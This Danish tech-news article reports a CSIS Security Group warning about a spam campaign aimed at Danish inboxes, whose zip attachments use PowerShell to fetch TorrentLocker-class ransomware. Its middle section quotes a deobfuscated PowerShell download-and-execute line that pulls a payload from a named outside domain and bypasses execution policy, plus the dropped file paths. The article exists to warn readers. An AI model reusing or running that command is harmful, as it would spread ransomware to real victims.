Artikel top billede

Modtager du en mail, der ligner ovenstående billede, bør du slette beskeden med det samme. Skærmdump: CSIS Security Group.

Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

En spambølge målrettet danske mail-modtager skyller ind over landet med filer, der kan hente ransomware på modtagerens computer. Læs her, hvad du skal passe på.

Det danske sikkerhedsselskab CSIS Security Group har flere timer torsdag i denne uge registreret en vedvarende, massiv spambølge rettet specifikt mod danske e-mailadresser.

Spambølgen kommer med et vedhæftet zip-arkiv, der kan gøre stor skade på modtagerens computer.

Skaden sker, hvis mail-modtageren åbner og aktiverer det vedhæftede zip-arkiv, der via Windows' PowerShell-framework vil hente ransomware iTorrentlocker-klassen, oplyser CSIS Security Group.

Sikkerhedsselskabet forklarer, at ransomwaren hentes fra to specifikke domæner, hvorfra der sendes inficeret JavaScript.

"Powershell koden ser ud som følgende i deobfuskeret form: DownloadFile(''http://nathanaylett.com/syst.vcx'',$path) Set-ExecutionPolicy Bypass -Scope Process; $path=($env:t+$mqedu+yzahe.exe'')." skriver CSIS Security Group i sin sikkerhedsadvarsel.

Sådan forløber angrebet

I CSIS Security Groups interne mail-beskyttelsesprogram er sikkerhedsniveauet hævet til 4 på en skala, hvor 5 er det højeste.

Sikkerhedsselskabet forklarer, at hvis ransomwaren får adgang til mail-modtagerens computer, vil koden kopiere sig på følgende lokationer:

C:\Users\[%brugerkonto%]\AppData\Local\Temp\985611.jse
C:\Users\[%brugerkonto%]\AppData\Local\Temp\ysyne.exe

"Den pågældende ransomware vil dernæst i vanlig stil begynde at kryptere data lokalt og på alle tilgængelige netværksdrev," lyder advarslen.

Derfor bør alle være ekstra opmærksomme, når de modtager mails med vedhæftede filer, obskure links og beskeder fra ukendte adresser.

Læs også:
Ransomware as a service boomer: Så nemt kan menigmand angribe dig med ransomware

Alvorlig afsløring: Halvdelen af alle ransomware-ofre ender med at betale løsepenge




Brancheguiden
Brancheguide logo
Opdateres dagligt:
Den største og
mest komplette
oversigt
over danske
it-virksomheder
Hvad kan de? Hvor store er de? Hvor bor de?
itm8 A/S
Outsourcing, hosting, decentral drift, servicedesk, konsulentydelser, salg og udleje af handelsvarer, udvikling af software.

Nøgletal og mere info om virksomheden
Skal din virksomhed med i Guiden? Klik her

Kommende events
Hybrid, on-premise eller public cloud. Bliv klogere på fremtidens datacenter

Få indblik i, hvordan du planlægger, designer og drifter dit datacenter, så det kan følge med virksomhedens vækst, støtter bæredygtighedsindsatsen og lever op til krav om effektiv datahåndtering.

25. februar 2025 | Læs mere


Identity Festival 2025

Er du klar til en dag, der udfordrer din forståelse af, hvad Identity & Access Management (IAM) kan gøre for din organisation? En dag fyldt med indsigt, inspiration og løsninger, der sætter kursen for, hvordan vi arbejder med IAM i de kommende år.

05. marts 2025 | Læs mere


Tech Transformation Trends 2025

Tech Transformation Trends er konferencen, hvor vi sætter fokus på de helt store Danske virksomheders digitale transformationer og måden de driver virksomhed på. Dagen byder på cases og vidensdeling, der vil give inspiration som kan være med til at løfte din strategi og navigere i fremtidens digitale landskab.

06. marts 2025 | Læs mere






White paper
Sådan: Opgradér din printerløsning uden store investeringer